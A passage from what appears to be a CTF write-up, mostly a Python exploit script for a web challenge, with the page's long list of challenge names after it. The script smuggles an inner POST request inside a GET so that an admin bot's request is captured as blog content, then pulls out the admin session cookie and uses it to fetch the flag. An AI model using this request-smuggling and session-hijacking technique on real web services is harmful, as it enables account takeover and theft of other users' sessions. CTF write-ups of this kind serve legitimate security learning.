    consumed as the missing body and stored as blog content.
    """
    if inner_body_len < 32 or inner_body_len > 264:
        die(f"inner_body_len out of expected range: {inner_body_len}")

    # Body is a single form param: content=<marker><captured-bytes>
    # Content length limit is 256 for the *content value*; body length includes "content=" (8 bytes).
    # We keep the value <= 256 by keeping body_len <= 264.
    inner_body_prefix = ("content=" + marker).encode()

    inner_req = (
        f"POST /my-blogs/create HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        f"Cookie: session={user_session}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {inner_body_len}\r\n"
        f"\r\n"
    ).encode() + inner_body_prefix

    outer_req = (
        f"GET /blogs/{CARRIER_BLOG_ID} HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        f"Cookie: session={user_session}\r\n"
        f"Connection: close\r\n"
        f"Content-Length: {len(inner_req)}\r\n"
        f"\r\n"
    ).encode() + inner_req

    resp = tls_send(outer_req, recv_bytes=4096, timeout=5.0)
    if resp:
        line = resp.split(b"\r\n", 1)[0].decode(errors="replace")
        print(f"[*] Poison outer response: {line}")
    else:
        print("[!] Poison outer response: (no data)")


def extract_admin_session_cookie(decoded_captured: str, user_session: str) -> str | None:
    cookies = re.findall(
        r"(?i)cookie:\s*session=([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})",
        decoded_captured,
    )
    for c in cookies:
        if c != user_session:
            return c
    return None


def main() -> None:
    prime_cache()

    # Register + login
    sess = requests.Session()
    username, password = mk_user()
    sess.post(BASE + "/register", data={"username": username, "password": password}, allow_redirects=False, timeout=15)
    sess.post(BASE + "/login", data={"username": username, "password": password}, allow_redirects=False, timeout=15)
    user_session = sess.cookies.get("session")
    if not user_session:
        die("No session cookie after login; aborting.")
    print(f"[*] User: {username}")
    print(f"[*] Session: {user_session}")

    # Create a blog to trigger admin review (normal request)
    before = set(list_my_blog_ids(sess))
    trig_content = "REVIEW_TRIGGER_" + uuid.uuid4().hex + "_1234567890"
    r = sess.post(BASE + "/my-blogs/create", data={"content": trig_content}, allow_redirects=False, timeout=15)
    if r.status_code not in (303, 302):
        die(f"Create review blog failed: {r.status_code} {r.text[:100]}")
    after = set(list_my_blog_ids(sess))
    new = list(after - before)
    if not new:
        die("Could not find newly created review blog ID.")
    review_blog_id = new[0]
    print(f"[*] Review blog id: {review_blog_id}")

    # We might need to retry: if we make any request in our bucket before the bot,
    # we will fill our own trap and won't leak the admin cookie.
    for attempt in range(1, 4):
        print(f"[*] Attempt {attempt}/3")

        r = sess.post(BASE + f"/my-blogs/{review_blog_id}/review", allow_redirects=False, timeout=15)
        print(f"[*] Trigger review: {r.status_code}")

        # Poison exactly once, then do not send any requests with our session until after admin bot time.
        token = uuid.uuid4().hex[:6]
        marker = f"LEAK_{token}_"

        # Tune capture length: enough bytes to include the full Cookie header value.
        inner_body_len = 256
        poison_waiting_post(user_session=user_session, marker=marker, inner_body_len=inner_body_len)

        # Wait for admin bot (10s sleep in source); leave margin.
        wait_s = 16
        print(f"[*] Waiting {wait_s}s for admin bot to fill the body...")
        time.sleep(wait_s)

        # Now fetch blogs and find the leak blog by marker, then extract admin cookie
        blog_ids = None
        # requests can get a chunked decode error if the proxy connection is in a bad state.
        # If that happens, rebuild the session (cookie-only) and retry.
        for _ in range(8):
            try:
                blog_ids = list_my_blog_ids(sess)
                break
            except requests.exceptions.ChunkedEncodingError:
                sess = requests.Session()
                sess.cookies.set("session", user_session, domain=HOST, path="/")
                time.sleep(1)
                continue
            except requests.HTTPError as e:
                status = getattr(e.response, "status_code", None)
                if status == 503:
                    time.sleep(2)
                    continue
                raise
        if blog_ids is None:
            print("[!] /my-blogs still unavailable after retries; continuing to next attempt.")
            continue

        leak_blog_id = None
        leak_raw = None
        for bid in blog_ids:
            c = get_my_blog_content(sess, bid)
            if marker in c:
                leak_blog_id = bid
                leak_raw = c
                break

        if not leak_blog_id or leak_raw is None:
            print("[!] Leak blog not found (marker missing).")
            continue

        decoded = urllib.parse.unquote_plus(leak_raw)
        admin_session = extract_admin_session_cookie(decoded, user_session=user_session)
        if not admin_session:
            print("[!] Admin session cookie not found in leak blog; retrying.")
            continue

        admin = requests.Session()
        admin.cookies.set("session", admin_session, domain=HOST, path="/")
        r = admin.get(BASE + "/flag", timeout=15)
        m = re.search(r"(p_ctf\{[^}]+\})", r.text)
        if not m:
            die("Did not get flag in response.")
        print(m.group(1))
        return

    die("All attempts failed to extract admin cookie.")


if __name__ == "__main__":
    main()

PreviousHome NextNullconCTF 2026

Last updated 7 hours ago

hashtagcrypto

hashtagDor4_Null5

hashtagDescription

hashtagSolution

hashtagDumCows

hashtagDescription

hashtagSolution

hashtag!!Cand1esaNdCrypt0!!

hashtagDescription

hashtagSolution

hashtagR0tnoT13

hashtagDescription

hashtagSolution

hashtagforensics

hashtagepstein files

hashtagDescription

hashtagSolution

hashtagH@rDl4u6H

hashtagDescription

hashtagSolution

hashtag$whoami

hashtagDescription

hashtagSolution

hashtagPlumbing

hashtagDescription

hashtagSolution

hashtagc47chm31fy0uc4n

hashtagDescription

hashtagSolution

hashtagmisc

hashtagLost in the Haze

hashtagDescription

hashtagSolution

hashtagTac Tic Toe

hashtagDescription

hashtagSolution

hashtagpwn

hashtagpCalc

hashtagDescription

hashtagSolution

hashtagDirty Laundry

hashtagDescription

hashtagSolution

hashtagTalking Mirror

hashtagDescription

hashtagSolution

hashtagTerViMator

hashtagDescription

hashtagSolution

hashtagweb

hashtagServer OC

hashtagDescription

hashtagSolution

hashtagShadow Fight

hashtagDescription

hashtagSolution

hashtagNote Keeper

hashtagDescription

hashtagSolution

hashtagDomain Registrar

hashtagDescription

hashtagSolution

hashtagShadow Fight 2

hashtagDescription

hashtagSolution

hashtagPicture This

hashtagDescription

hashtagSolution

hashtagCrossing Boundaries

hashtagDescription

hashtagSolution

crypto

Dor4_Null5

Description

Solution

DumCows

Description

Solution

!!Cand1esaNdCrypt0!!

Description

Solution

R0tnoT13

Description

Solution

forensics

epstein files

Description

Solution

H@rDl4u6H

Description

Solution

$whoami

Description

Solution

Plumbing

Description

Solution

c47chm31fy0uc4n

Description

Solution

misc

Lost in the Haze

Description

Solution

Tac Tic Toe

Description

Solution

pwn

pCalc

Description

Solution

Dirty Laundry

Description

Solution

Talking Mirror

Description

Solution

TerViMator

Description

Solution

web

Server OC

Description

Solution

Shadow Fight

Description

Solution

Note Keeper

Description

Solution

Domain Registrar

Description

Solution

Shadow Fight 2

Description

Solution

Picture This

Description

Solution

Crossing Boundaries

Description

Solution